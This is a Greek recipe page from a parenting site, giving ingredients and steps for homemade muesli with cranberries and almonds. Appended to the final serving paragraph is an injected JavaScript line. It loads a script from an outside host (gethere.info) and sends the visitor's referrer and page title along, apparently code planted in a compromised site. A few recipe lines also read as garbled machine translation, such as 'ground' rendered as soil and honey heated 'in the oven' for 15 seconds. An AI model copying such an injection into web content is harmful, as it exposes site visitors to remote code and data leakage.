mommy
thilasmos
toketos
mycare - φροντίδα
athome
arkoudos
nanny - επιλέγοντας νταντάδες

Συνταγή για μούσλι με cranberries και αμύγδαλα

Συνταγή για μούσλι με cranberries και αμύγδαλα

L11306171Το μούσλι είναι ένας τύπος δημητριακών πρωινού από νιφάδες βρώμης, ξηρούς καρπούς και φρούτα, που πρωτοεμφανίστηκε πριν από περισσότερα από 100 χρόνια στην Ελβετία. Τότε, είχε προωθηθεί για τα οφέλη του για την υγεία, και παραμένει δημοφιλές στη βόρεια Ευρώπη, αλλά και στην χώρα μας τα τελευταία χρόνια. Σήμερα, μπορούμε να αγοράσουμε συσκευασμένο μούσλι, ή μπορούμε να αναμίξουμε το δικό μας, με τα συστατικά που μας αρέσουν περισσότερο. Μπορούμε να επιλέξουμε πλούσιες σε φυτικές ίνες βρώμη (ολικής αλέσεως), λιναρόσπορο (πηγή για ωμέγα-3 λιπαρά οξέα), καθώς και μια ποικιλία από αποξηραμένα φρούτα, ξηρούς καρπούς και σπόρους, τα οποία παρέχουν βιταμίνη C και πρωτεΐνες, αντίστοιχα. Όταν ετοιμάζουμε μούσλι για να το σερβίρουμε στα παιδιά, είναι μια ευκαιρία να τα συμπεριλάβουμε τόσο στην επιλογή των συστατικών, όσο και στην διαδικασία της προετοιμασίας. Έτσι, είναι πιο πιθανό ότι θα καταναλώσουν το μπολ με το μούσλι με μεγάλη ευχαρίστηση, θα ενεργοποιηθούν ως προς την ενασχόληση με την κουζίνα και θα αρχίζουν να αποκτούν αντίληψη περί υγιεινών διατροφικών επιλογών.

Υλικά
2 φλιτζάνια νιφάδες βρώμης
1/2 φλιτζάνι νιφάδες βρώμης σικάλεως ή ολικής αλέσεως
1/2 φλιτζάνι αμύγδαλα ή άλλους ξηρούς καρπούς (όπως φουντούκια ή καρύδια)
1/4 φλιτζάνι μη καβουρντισμένους, ανάλατους ηλιόσπορους ή σπόρους κολοκύθας
1/2 φλιτζάνι νιφάδες καρύδας
1/2 φλιτζάνι αποξηραμένα cranberries ή σταφίδες
1/2 φλιτζάνι ψιλοκομμένα αποξηραμένα βερίκοκα, μήλα ή σύκα
2 κ.σ. λιναρόσπορο έδαφος (προαιρετικό)
1/4 φλιτζάνι μέλι
1 κ.γ. εκχύλισμα βανίλιας
1/2 κ.γ. κανέλα
1/2 κ.γ. αποξηραμένο τζίντζερ
1 πρέζα αλάτι

Εκτέλεση
1. Προθερμαίνουμε το φούρνο στους 220 βαθμούς Κελσίου.
2. Απλώνουμε τη βρώμη σε ένα μεγάλο ταψί.
3. Ψήνουμε για 10 λεπτά, ανακατεύοντας κατά διαστήματα για να μην καεί.
4. Προσθέτουμε τα αμύγδαλα, τους σπόρους κολοκύθας και τις νιφάδες καρύδας στο μείγμα βρώμης. Ανακατεύουμε και απλώνουμε στο ταψί. 5. Ψήνουμε για επιπλέον 7 έως 10 λεπτά, ανακατεύοντας κατά διαστήματα, μέχρι να ροδίσει ελαφρά.
6. Αφαιρούμε από το φούρνο και αφήνουμε να κρυώσει.
7. Μεταφέρουμε το μείγμα βρώμης σε ένα μεγάλο μπολ. Προσθέτουμε τα cranberries τα βερίκοκα και το λιναρόσπορο και ανακατεύουμε.
8. Ζεσταίνουμε το μέλι στο φούρνο για περίπου 15 δευτερόλεπτα. Προσθέτουμε τη βανίλια, την κανέλα και το τζίντζερ στο μέλι και ανακατεύουμε.
9. Περιχύνουμε με το μείγμα μελιού το μείγμα της βρώμης και ανακατεύουμε καλά.

*Για ένα γρήγορο γεύμα το πρωί, σερβίρουμε μούσλι με γιαούρτι και φρέσκα φρούτα, όπως μήλα, φέτες μπανάνας ή μούρα. Για σνακ ή επιδόρπιο, το μούσλι μπορεί να προστεθεί στο παγωτό, δίνοντας μια θρεπτική παρφέ αίσθηση.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Share This
2 Σχόλια
  1. […] Συνταγή για μούσλι με cranberries και αμύγδαλα […]

  2. […] Συνταγή για μούσ&lambda… […]